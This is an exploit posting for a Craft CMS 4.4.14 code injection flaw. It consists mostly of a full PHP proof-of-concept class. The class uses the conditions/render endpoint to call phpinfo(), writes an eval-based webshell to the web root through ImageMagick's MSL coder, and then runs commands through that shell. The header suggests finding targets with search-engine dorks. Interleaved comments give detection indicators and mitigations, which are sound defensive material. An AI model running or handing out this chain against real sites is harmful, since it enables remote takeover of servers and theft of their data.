Craft CMS 4.4.14 Code Injection

=============================================================================================================================================
| # Title : Craft CMS 4.4.14 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://craftcms.com/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engines.

[+] Uses cURL to allow remote commands.

[+] Line 116 set your target .

[+] save code as poc.php .

[+] Usage : cmd => c:\www\test\php poc.php

[+] Payload :

<?php
/**
 * PoC harness from the page above (Craft CMS 4.4.14, "Code Injection").
 *
 * Annotated from a defensive stance: the request shapes below are the
 * indicators a WAF rule, access-log query or IDS signature should key on.
 *
 * Detection: POST bodies carrying `action=conditions/render` together with
 * a `configObject[class]` parameter and a JSON `config` value that names
 * classes unrelated to conditions (here `GuzzleHttp\Psr7\FnStream` and
 * `Imagick`). A follow-on POST to a newly created, random-named .php file
 * at the web root (execute_command()) is the second indicator.
 *
 * Mitigation: run a Craft CMS release that addresses this issue (the page
 * lists 4.4.14 as the tested version); keep phpinfo() unreachable in
 * production; restrict ImageMagick's MSL coder in policy.xml
 * (`<policy domain="coder" rights="none" pattern="MSL" />`); alert on new
 * PHP files appearing under document_root.
 */
class CraftCMSExploit {
// Base URL of the target, supplied by the caller.
private $target_uri;
// File name written under document_root by upload_webshell().
private $webshell;
// Filled by parsePHPInfo(); both stay null when no phpinfo() table is seen.
private $config = [‘upload_tmp_dir’ => null, ‘document_root’ => null];
// Random parameter name the uploaded file reads from $_POST.
private $post_param;
// Assigned in the constructor but not referenced anywhere else in this listing.
private $get_param;

/**
 * @param string $target_uri base URL every request is sent to
 * @param string $webshell   optional file name; when empty a random
 *                           8–16 letter name with a .php suffix is used
 */
public function __construct($target_uri, $webshell = ”) {
$this->target_uri = $target_uri;
$this->webshell = $webshell ? $webshell : $this->generateRandomString(8, 16) . ‘.php’;
// Parameter names are random 1–8 letters, so detection cannot rely on a
// fixed parameter name and has to key on the action/path instead.
$this->post_param = $this->generateRandomString(1, 8);
$this->get_param = $this->generateRandomString(1, 8);
}

/**
 * Step 1: makes the target emit phpinfo() so document_root can be read.
 *
 * Detection: the `config` JSON names `GuzzleHttp\Psr7\FnStream` with a
 * `close` callback of `phpinfo`; a `conditions/render` request whose
 * config references a stream class is not legitimate traffic. A response
 * containing a phpinfo() table is itself a finding for the defender.
 *
 * @return void
 */
public function check_phpinfo() {
// Sends a crafted request to extract upload_tmp_dir and document_root from phpinfo()
$data = http_build_query([
‘action’ => ‘conditions/render’,
‘configObject[class]’ => ‘craft\\elements\\conditions\\ElementCondition’,
‘config’ => ‘{“name”:”configObject”,”as “:{“class”:”\\\GuzzleHttp\\\Psr7\\\FnStream”, “__construct()”:{“methods”:{“close”:”phpinfo”}}}}’
]);

// sendPostRequest() yields false on transport failure; parsing is skipped then.
$response = $this->sendPostRequest($this->target_uri, $data);
if ($response) {
$this->parsePHPInfo($response);
}
}

/**
 * Pulls upload_tmp_dir and DOCUMENT_ROOT out of phpinfo() HTML.
 *
 * Only document_root is consumed later (upload_webshell()); upload_tmp_dir
 * is recorded but unused in this listing. A hardened install returns no
 * phpinfo() table here, leaving both config entries null.
 *
 * @param string $response raw HTML body of the phpinfo() response
 * @return void
 */
private function parsePHPInfo($response) {
// Parses the phpinfo() HTML response to find upload_tmp_dir and document_root
if (preg_match(‘/upload_tmp_dir.+<td class=”v”>(.*)<\/td>/i’, $response, $matches)) {
// phpinfo() prints "no value" when the ini setting is unset; /tmp is assumed then.
$this->config[‘upload_tmp_dir’] = $matches[1] == ‘no value’ ? ‘/tmp’ : trim($matches[1]);
}
if (preg_match(‘/DOCUMENT_ROOT.+<td class=”v”>(.*)<\/td>/i’, $response, $matches)) {
$this->config[‘document_root’] = trim($matches[1]);
}
}

/**
 * Step 2: writes a PHP file under document_root via ImageMagick's MSL coder.
 *
 * The `config` JSON instantiates `Imagick` with `files` pointing at an
 * `msl:` path; the MSL document in `$payload` reads a `caption:` source
 * containing the eval stub and writes it to `info:<document_root>/<webshell>`
 * (see the two filename attributes).
 *
 * Detection/mitigation: deny the MSL coder in ImageMagick's policy.xml and
 * alert on new .php files under document_root. Note the success test: the
 * method returns true when the literal `502` occurs anywhere in the
 * response body, i.e. a gateway error is treated as success.
 *
 * @return bool true when `502` is found in the response body
 */
public function upload_webshell() {
// Generates an XML payload to upload the webshell via Imagick MSL
$payload = “<?xml version=\”1.0\” encoding=\”UTF-8\”?>
<image>
<read filename=\”caption:<?php @eval(base64_decode(\$_POST[‘{$this->post_param}’])); ?>\” />
<write filename=\”info:{$this->config[‘document_root’]}/{$this->webshell}\” />
</image>”;

$form_data = [
‘action’ => ‘conditions/render’,
‘configObject[class]’ => ‘craft\\elements\\conditions\\ElementCondition’,
‘config’ => ‘{“name”:”configObject”,”as “:{“class”:”Imagick”, “__construct()”:{“files”:”msl:/dev/null”}}}’,
‘payload’ => $payload
];

$response = $this->sendMultipartPostRequest($this->target_uri, $form_data);
// Substring match only; no status-code check is performed.
return strpos($response, ‘502’) !== false;
}

/**
 * Step 3: POSTs a base64-encoded command to the uploaded file.
 *
 * Detection: POST requests to a recently created .php file at the web root
 * carrying a single short random parameter name with a base64 value.
 *
 * @param string $cmd command string passed through base64_encode()
 * @return string|false response body, or false if the request failed
 */
public function execute_command($cmd) {
// Executes a command on the server via the uploaded webshell
$payload = base64_encode($cmd);
$data = http_build_query([$this->post_param => $payload]);

return $this->sendPostRequest($this->target_uri . ‘/’ . $this->webshell, $data);
}

/**
 * Form-encoded POST through the http stream wrapper.
 *
 * Only header/method/content are set on the context; no timeout or TLS
 * options are configured, so wrapper defaults apply.
 *
 * @param string $uri  absolute URL
 * @param string $data already url-encoded body
 * @return string|false body, or false on failure (no exception is thrown)
 */
private function sendPostRequest($uri, $data) {
$options = [
‘http’ => [
‘header’ => “Content-type: application/x-www-form-urlencoded\r\n”,
‘method’ => ‘POST’,
‘content’ => $data,
],
];
$context = stream_context_create($options);
return file_get_contents($uri, false, $context);
}

/**
 * multipart/form-data POST through the http stream wrapper.
 *
 * The boundary comes from uniqid(); the body is assembled by
 * buildMultipartData() with `$delimiter` as the part separator.
 *
 * @param string               $uri  absolute URL
 * @param array<string,string> $data field name => field content
 * @return string|false body, or false on failure (no exception is thrown)
 */
private function sendMultipartPostRequest($uri, $data) {
// Sends a multipart form-data POST request
$boundary = uniqid();
$delimiter = ‘——‘ . $boundary;

$post_data = $this->buildMultipartData($data, $delimiter);

$options = [
‘http’ => [
‘header’ => “Content-Type: multipart/form-data; boundary=” . $boundary . “\r\n”,
‘method’ => ‘POST’,
‘content’ => $post_data,
],
];

$context = stream_context_create($options);
return file_get_contents($uri, false, $context);
}

/**
 * Serialises fields as multipart parts: one Content-Disposition header per
 * field, no filename or content-type attributes, closing delimiter at the end.
 *
 * @param array<string,string> $data      field name => field content
 * @param string               $delimiter part separator (without the leading dashes)
 * @return string raw multipart body
 */
private function buildMultipartData($data, $delimiter) {
$post_data = ”;
foreach ($data as $name => $content) {
$post_data .= “–$delimiter\r\n”;
$post_data .= “Content-Disposition: form-data; name=\”$name\”\r\n\r\n”;
$post_data .= “$content\r\n”;
}
$post_data .= “–$delimiter–\r\n”;
return $post_data;
}

/**
 * Random ASCII-letter string of length rand($min, $max).
 *
 * rand() is not a CSPRNG; the names only need to vary between runs, which
 * is why a fixed-name signature does not catch this traffic.
 *
 * @param int $min inclusive lower bound on length
 * @param int $max inclusive upper bound on length
 * @return string
 */
private function generateRandomString($min, $max) {
$length = rand($min, $max);
return substr(str_shuffle(‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ’), 0, $length);
}
}

// Usage
// Placeholder host. check_phpinfo() runs first because upload_webshell()
// interpolates $this->config['document_root'], which only that call fills.
$exploit = new CraftCMSExploit(‘http://target-craftcms.com’);
$exploit->check_phpinfo();
// upload_webshell() reports success solely on a "502" substring in the response.
if ($exploit->upload_webshell()) {
echo $exploit->execute_command(‘whoami’);
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
